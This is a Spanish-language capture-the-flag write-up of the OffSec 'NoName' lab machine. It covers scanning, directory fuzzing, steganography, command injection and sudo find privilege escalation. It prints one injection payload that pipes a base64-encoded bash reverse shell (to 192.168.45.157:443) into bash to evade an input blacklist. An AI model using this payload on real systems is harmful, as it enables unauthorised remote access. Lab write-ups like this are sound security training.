> For the complete documentation index, see [llms.txt](https://rodgar.gitbook.io/rodgar/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rodgar.gitbook.io/rodgar/plataformas/vulnhub/offsec-noname.md).

# OffSec NoName

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FSP3gLOjazhNaluCCcx7n%2FCaptura%20de%20pantalla%202024-01-11%20a%20las%2017.57.44.png?alt=media&amp;token=13005821-f949-41c7-a57e-9d32958d90c6" alt=""><figcaption></figcaption></figure>

Hoy vamos a resolver la maquina NoName de OffSec.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2F7IhQPX2aHsybAs82bGqz%2F1.png?alt=media&amp;token=4f208ee1-10cb-4672-a069-418cf6cbf1a0" alt=""><figcaption></figcaption></figure>

Primeor que nada un escaneo para ver puertos abiertos dentro de la maquina.

```javascript
# Nmap 7.94SVN scan initiated Thu Jan 11 18:00:26 2024 as: nmap -sCV -p80 -oN taregt.txt 192.168.170.15
Nmap scan report for 192.168.170.15
Host is up (0.051s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 11 18:00:35 2024 -- 1 IP address (1 host up) scanned in 9.54 seconds

```

Ahora siguiendo con Nmap vamos a ver las versiones y servico que corren para este unico puerto abierto.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FAYtrgwxPM2Skg3uRuktX%2F2.png?alt=media&amp;token=8bdbfc26-cb5f-4387-8302-34934156588f" alt=""><figcaption></figcaption></figure>

Ahora haciendo uso de Wfuzz encontramos un directorio en la pagina web llamado admin.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FHafxd4LHfkNqDpJf1lx9%2F3.png?alt=media&amp;token=aab5d327-2b3c-41d2-b947-362b2d9191e0" alt=""><figcaption></figcaption></figure>

Si nos vamos a lo que habiamos encontrado nos damos de tope con estas imagenes que estan en la web, vamos inspeccionar el codigo fuente haber si encontramos algo.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FgXOMm3PqpBU72l5jZTIs%2F4.png?alt=media&amp;token=d2e7bdeb-92ae-4bd1-a3b4-31c55d46d870" alt=""><figcaption></figcaption></figure>

En el codigo fuente tenemos esta pequeña pista, que igualmente tenemos tres imagenes a las cuales haremos estenografia haber que sale.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FsT7bUKbyfQ2lcIqkR3yi%2F5.png?alt=media&amp;token=3729ce95-4a0e-4860-97f3-a98dbfa2dc7f" alt=""><figcaption></figcaption></figure>

Si nos descargamos a haclabs y hacemos uso de steghide encontramos algo.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2Fc63BriWDVxFjzmYtPA3T%2F6.png?alt=media&amp;token=a54b92ac-6c0c-4985-a55d-c655f835d076" alt=""><figcaption></figcaption></figure>

Un contenido que estaba en base64 ahora lo pasamos a texto normal y nos estan dando un nuevo directorio dentro de la web.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FRm1f4bqY5kB3OJyjTVbQ%2F7.png?alt=media&amp;token=8892fca3-dfb0-4776-bcbf-6966aa93ba7f" alt=""><figcaption></figcaption></figure>

Si nos vamos al directorio superadmin.php, y su hacemos un | whoami, nos dice que somos www-data, pero estube probando ls -l pwd y otros y solo funciona este. Seguro por detras haya una lista negra de inputs no permitidos.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FI9mFtftK4Bx1jWtaoa60%2F8.png?alt=media&amp;token=d6d00ad4-256e-4d8f-8111-1857ce08a995" alt=""><figcaption></figcaption></figure>

Si le hacemos un cat ah superadmin.php.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2F0njDGc9xJbNjzbcKvXiW%2F9.png?alt=media&amp;token=c10e7f81-0fde-4c1f-898f-635d50688d24" alt=""><figcaption></figcaption></figure>

Nos damos con esto una lista negra donde estan contemplados que no se permite como input.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2F9xpEH1KkuPCNoKFw2sNT%2F10.png?alt=media&amp;token=77efb017-9030-410d-9ba7-b6030105010b" alt=""><figcaption></figcaption></figure>

Entonces como ganamos acceso si nuestras herramientas estan en una lista negra, pues facil vamos pasar los tipicos comandos que ponemos para ganar acceso a una maquina en bas64 haciendo uso de echo.

```java
127.0.0.1|echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE1Ny80NDMgMD4mMQo='|base64 -d |bash

De esta forma introduce tu cadena codificada en el input.
```

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2F8rdtyjXEYvAMYX2FKHPD%2F11.png?alt=media&amp;token=c5d89c78-ac20-41a0-a417-a0532d8220b2" alt=""><figcaption></figcaption></figure>

Observamos que ganamos acceso como www-data.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FeSCravDKlVFPLtwddyEq%2F12.png?alt=media&amp;token=bb82dd23-c69e-4d30-8375-cdc0a7e7d5e6" alt=""><figcaption></figcaption></figure>

Buscando nos dejan una pista por aca donde dice que la contraseña esta escondida en un archivo.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FMiuNx0YIK58aJCok1AEC%2F13.png?alt=media&amp;token=dcb19d7f-33d3-4fcb-b047-468cd668d82c" alt=""><figcaption></figcaption></figure>

Entonces si buscamos desde la raiz todo tipo de archivos para el usuario yash, nos contramos varios, pero el importante es el .passwd donde se almacena una contraseña.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FM7R3oBS2D3LXxMILc3eg%2F14.png?alt=media&amp;token=5af0f2d8-4465-4d04-b605-5e190078f9fa" alt=""><figcaption></figcaption></figure>

Hacemos uso de la contraseña y si hacemos un whoami somos haclabs.

Y buscando permisos si hacemos un sudo -l observamos que este usuario puede ejecutar como root el comando find. Si te vas a gtfobins.io seguro que encuentras algo del como usarlo para escalar privilegios.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2F79dJ4wz6s6LWXm6hrPcp%2F15.png?alt=media&amp;token=563f315f-be2e-4b92-9f17-db959e79870b" alt=""><figcaption></figcaption></figure>

Encontramos la forma de usarlo para escalar privilegios, nos convertimos en root y bueno maquina resuelta.
